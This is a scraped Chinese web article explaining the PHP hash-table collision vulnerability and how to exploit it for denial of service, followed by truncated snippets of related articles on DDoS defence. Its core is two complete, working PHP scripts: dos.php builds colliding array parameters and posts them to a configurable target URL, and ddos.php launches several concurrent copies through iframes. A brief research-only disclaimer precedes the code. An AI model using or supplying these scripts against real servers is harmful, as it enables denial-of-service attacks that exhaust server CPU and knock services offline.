PHP利用hash冲突漏洞进行DDoS攻击的方法分析

 这篇文章主要介绍了PHP利用hash冲突漏洞进行DDoS攻击的方法,实例分析了php利用hash进行DDoS攻击的原理与实现技巧,需要的朋友可以参考下

 
 

本文实例分析了PHP利用hash冲突漏洞进行DDoS攻击的方法。分享给大家供大家参考。具体分析如下:

首先声明:本文内容只用于研究学习使用,请勿用于非法行为!

前面提到过最近爆出的hash表碰撞漏洞,包括java、python、php等在内的很多常用语言均未幸免,今晚咱就来实际看看它的威力。

攻击原理:

通过向目标服务器post一组精心拼凑的数组参数,到达服务端后语言底层处理接收到的数组参数时,由于该漏洞的存在造成CPU的大量消耗,最终导致服务器资源耗尽。
不用什么花哨的手法,就用PHP简单实现下看下效果,点到即止。

文件:dos.php

?

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28

// 目标地址
// 只要目标地址存在,不用管它是干嘛的
$host = 'http://127.0.0.1/test.php';
$data = '';
$size = pow(2, 15);
for ($key=0, $max=($size-1)*$size; $key<=$max; $key+=$size)
{
$data .= '&array[' . $key . ']=0';
}
$ret = curl($host, ltrim($data,'&'));
var_dump($ret);
function curl($url, $post, $timeout = 30){
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_TIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout - 5);
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Expect:'));
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
$output = curl_exec($ch);
if ($output === false) return false;
$info = curl_getinfo($ch);
$http_code = $info['http_code'];
if ($http_code == 404) return false;
curl_close($ch);
return $output;
}

文件:ddos.php

?

1
2
3
4
5
6
7
8
9
10
11
12
13
14

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>DDOS</title>
</head>
<body>
<?php
for($i=0; $i<5; $i++){//并发数
echo '<iframe src="dos.php?a='.$i.'" scrolling="false" frameborder="1" allowtransparency="true" style="background-color:transparent;"></iframe>';
}
?>
</body>
</html>

希望本文所述对大家的php程序设计有所帮助。

时间: 2025-01-02 15:51:46

PHP利用hash冲突漏洞进行DDoS攻击的方法分析的相关文章

PHP利用hash冲突漏洞进行DDoS攻击的方法分析_php技巧

本文实例分析了PHP利用hash冲突漏洞进行DDoS攻击的方法.分享给大家供大家参考.具体分析如下: 首先声明:本文内容只用于研究学习使用,请勿用于非法行为! 前面提到过最近爆出的hash表碰撞漏洞,包括java.python.php等在内的很多常用语言均未幸免,今晚咱就来实际看看它的威力. 攻击原理: 通过向目标服务器post一组精心拼凑的数组参数,到达服务端后语言底层处理接收到的数组参数时,由于该漏洞的存在造成CPU的大量消耗,最终导致服务器资源耗尽. 不用什么花哨的手法,就用PHP简单实现

Linux防DDOS攻击一些方法总结

DDoS deflate介绍 DDoS deflate是一款免费的用来防御和减轻DDoS攻击的脚本.它通过netstat监测跟踪创建大量网络连接的IP地址,在检测到某个结点超过预设的限 制时,该程序会通过APF或IPTABLES禁止或阻挡这些IP. DDoS deflate官方网站:http://deflate.medialayer.com/ 如何确认是否受到DDOS攻击?执行:  代码如下 复制代码 netstat -ntu | awk '{print $5}' | cut -d: -f1 |

针对爱尔兰DDoS攻击的取证分析

在过去一段时间内,爱尔兰的许多在线服务和公共网络都遭受到了 DDoS 攻击.英国广播公司(BBC)最近的一篇文章[ 链接]就指出 2016 年 DDoS 攻击事件将呈现上升趋势. 针对爱尔兰的 DDoS 攻击大部分为 NTP 放大攻击.之所以使用 NTP 进行DDoS攻击,主要是因为 NTP 像 DNS 一样是一个基于 UDP 的简单协议,可以通过发送一个很小的请求包产生巨大的相应包. 本文首先会针对此次 DDoS 攻击进行取证分析,随后会给出缓解这类 DDoS 攻击的方法.文中所有的截图来源于

Akamai检测到超过400起利用DNSSEC协议的反射DDoS攻击

Akamai是一家大型互联网CDN服务提供商,然而根据其最新的DDoS趋势报告,发现利用DNSSEC协议的这类攻击已经更加猖獗.DNSSEC是"域名系统安全扩展"的简称,作为DNS协议的扩展,其包括了诸多保护DNS认证和数据完整度的安全特性(因此叫它DNS+security也行),然而"反射DDoS"也在滥用DNSSEC协议. 业内也将反射DDoS称作R-DDoS.DRDoS或"分布式反射拒绝服务攻击".去年8月份的时候,我们曾深入解析过诸多借助

黑客利用开放的Portmap放大DDoS攻击

2015年8月19日在15点11分,安全观察员约翰·莱顿对于新一类能造成大程度攻击威胁的DDoS攻击威胁发出过警告,当太多用户未能遵守基本的安全保障时便会造成这种威胁. 错误配置的服务如DNS或网络时间协议(NTP)在过去的几年中,导致了一系列的DDOS攻击.并且其中最引人注目的一次攻击是在2013年3月,Spamhaus和互联网交易都相继被攻破.在最近几周,美国发出三级警告指明,另一个服务- Portmap又成为了DDos攻击的目标,. 上周黑客使用三级监控技术,专注于攻击游戏,群众和互联网基

黑客利用智能绘图平板发起DDoS攻击

英国网络防御公司Darktrace上周发布的报告显示,黑客使用新方法利用智能设备发起攻击.这份报告包含Darktrace 调查的9个案例分析,其中2起网络事件因物联网设备造成. 黑客利用智能绘图平板来实施DDoS攻击 Darktrace专家在其中一起案例中揭露,黑客劫持建筑公司使用的智能绘图平板构建物联网僵尸网络,实施DDoS攻击. 这类设备连接到办公室Wi-Fi,却未修改默认登录密码,黑客便可以通过一系列渠道访问设备.任何外部攻击者也可以使用绘图平板软件的默认登录凭证访问设备. 报告指出,扫描

SSH服务的几个超时参数 以及 类似DDOS攻击的方法

背景 sshd是Linux的一个常用的网络连接的服务,通常被用来远程连接,管理服务器. 一般我们很少去配置sshd,本文要给大家分享几个sshd的参数,有超时参数,有触发拒绝连接的参数等等. 如果你哪天遇到类似的问题,也行能帮助你找到问题的根源. sshd 空闲超时参数 man sshd_config 连续接收到几次sshd发送给客户端的alive包之后,中断该SSH会话. ClientAliveCountMax Sets the number of client alive messages

局域网伪造源地址DDoS攻击解决方法

[毛病表象]假造源地址进犯中,黑客机器向受害主机发送许多假造源地址的TCP SYN报文,占用安全网关的NAT会话资源,最终将安全网关的NAT会话表占满,招致局域网内一切人无法上彀. [疾速查找]在WebUIà体系状况àNAT计算àNAT状况,可以看到"IP地址"一栏里边有许多不属于该内网IP网段的用户: 在WebUIà体系状况à用户计算à用户计算信息,可以看到安全网关接收到某用户(192.168.0.67/24)发送的海量的数据包,可是安全网关发向该用户的数据包很小,依此判别该用户能够

linux 防御小规模DDOS攻击配置方法

防御原理 DDoS deflate的原理是通过netstat命令找出 发出过量连接的单个IP,并使用iptables防火墙将这些IP进行拒绝.由于iptables防火墙拒绝IP的连接远比从Apache层面上来得高效,因此iptables便成了运行在Apache前端的"过滤器".同样的,DDoS deflate也可以设置采用APF(高级防火墙)进行IP阻止. 如何确定DDOS攻击? 执行: Shell netstat -ntu | awk '{print $5}' | cut -d: -